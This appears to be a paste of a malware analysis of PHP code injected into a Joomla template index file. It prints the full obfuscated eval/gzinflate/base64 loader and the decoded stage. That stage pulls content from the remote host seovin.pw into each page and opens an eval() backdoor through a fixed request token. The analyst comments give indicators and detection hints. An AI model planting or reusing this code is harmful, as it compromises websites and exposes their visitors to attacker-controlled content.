
Joomla! Template Index Code injection

scurit Sep 9th, 2014 283 Never
  1. <?php /* Analyst note: the \x-escaped replacement argument spells eval(gzinflate(base64_decode('...'))); and the "e" modifier on the pattern makes preg_replace() evaluate that string as PHP, so the base64 blob is inflated and executed on every load of the file. The "e" modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this loader only executes on older PHP versions. Detection: a preg_replace() call with an "e" modifier and hex-escaped text in a template index file. */ preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",""); ?>
  2.  
  3. DECODED (the PHP that the eval(gzinflate(base64_decode(...))) call on line 1 executes):
  4.  
  5.  
  6. <?php ?><?php if (!function_exists('indget')) {
    /*
     * Analyst notes on the decoded stage.
     *
     * What it does: defines indget(), prints whatever indget() fetched from
     * seovin.pw into the page, and then exposes an eval() backdoor keyed on a
     * fixed request token.
     *
     * Indicators visible in this listing: function name indget, cookie name
     * client_check, host seovin.pw (path /get.php, plain HTTP on port 80),
     * request parameters p (token 6d629812) and c, and the md5 prefix string
     * 2286bcad8cf9d1f8db884e50208a205c.
     *
     * The function_exists() guard wraps the definition AND the echo/eval below,
     * so all of it is skipped when indget() already exists in the request.
     *
     * Because the eval() branch executes request-supplied PHP, a site carrying
     * this code should be handled as fully compromised: removing the injected
     * line alone does not account for what may have been run through it.
     */
  7.     function indget() {
        /*
         * Requests content from seovin.pw for the current page view and returns it.
         * Sends the requested host + URI and the visitor's User-Agent.
         * Transport order: file_get_contents(), then cURL, then a raw socket.
         * Returns the transport's result (the first two yield false on failure);
         * returns nothing (null) when the socket cannot be opened.
         */
        // Error output is switched off for the rest of the request, which hides
        // warnings that would otherwise reveal the injected code.
  8.         error_reporting(0);
  9.         ini_set("display_errors", "0");
        // A request carrying a non-empty client_check cookie gets that cookie value
        // printed back unescaped and the page terminated. Presumably a presence
        // check for the injection (unconfirmed); it is also reflected output.
  10.         if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
        // preg_match() with the u flag returns false on invalid UTF-8, so "u" means
        // the running script file is valid UTF-8 with non-whitespace content and
        // "w" means anything else. Presumably a charset hint for the remote side
        // (unconfirmed).
  11.         if (preg_match('!\S!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "u";
  12.         else $c = "w";
  13.         $d = $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; // host + path of the page being viewed
  14.         $u = $_SERVER["HTTP_USER_AGENT"]; // visitor's User-Agent, forwarded to the remote host
        // h is an md5 over a fixed string plus the same d, u, c values and "1";
        // presumably a request checksum verified by the remote end (unconfirmed).
        // Every page view therefore produces an outbound HTTP request to seovin.pw,
        // which is visible in egress/proxy/DNS logs.
  15.         $url = "http://seovin.pw/get.php?d=" . urlencode($d) . "&u=" . urlencode($u) . "&c=" . $c . "&i=1&h=" . md5("2286bcad8cf9d1f8db884e50208a205c" . $d . $u . $c . "1");
  16.         if (ini_get("allow_url_fopen") == 1) { // first choice: URL wrapper, if enabled
  17.             return file_get_contents($url);
  18.         } elseif (function_exists("curl_init")) { // second choice: cURL extension
  19.             $ch = curl_init($url);
  20.             curl_setopt($ch, CURLOPT_HEADER, FALSE); // body only, no response headers
  21.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); // return the body instead of printing it
  22.             $result = curl_exec($ch);
  23.             curl_close($ch);
  24.             return $result;
  25.         } else { // last resort: hand-written HTTP/1.1 request over a socket
  26.             $fp = fsockopen("seovin.pw", 80, $errno, $errstr, 30); // 30 second connect timeout
  27.             if ($fp) {
                // Same query string as $url. The line breaks and the "29."-style
                // numbers inside the string literals below come from this listing's
                // gutter, not from the sample itself.
  28.                 $out = "GET /get.php?d=" . urlencode($d) . "&u=" . urlencode($u) . "&c=" . $c . "&i=1&h=" . md5("2286bcad8cf9d1f8db884e50208a205c" . $d . $u . $c . "1") . " HTTP/1.1
  29. ";
  30.                 $out.= "Host: seovin.pw
  31. ";
  32.                 $out.= "Connection: Close
  33.  
  34. ";
  35.                 fwrite($fp, $out);
  36.                 $resp = "";
  37.                 while (!feof($fp)) { // read the whole response until the server closes
  38.                     $resp.= fgets($fp, 128);
  39.                 }
  40.                 fclose($fp);
  41.                 list($header, $body) = preg_split("/\R\R/", $resp, 2); // split at the first blank line; $header is not used
  42.                 $ind = 1; // never read afterwards
  43.                 return $body;
  44.             }
  45.         }
  46.     }
    // The fetched content is written into the page as-is, so the remote host
    // decides what markup or script visitors of the infected site receive.
  47.     echo indget();
    // Backdoor: when request parameter p loosely equals the fixed token, request
    // parameter c is unslashed and passed to eval(), i.e. PHP supplied in the
    // request runs with the web server's privileges. The @ hides the notice for
    // a missing p. $_REQUEST is used, so the values are not limited to the query
    // string; access logs that record only URLs may not show every use.
  48.     if (@$_REQUEST["p"] == "6d629812") eval(stripslashes($_REQUEST["c"]));
  49. }; ?>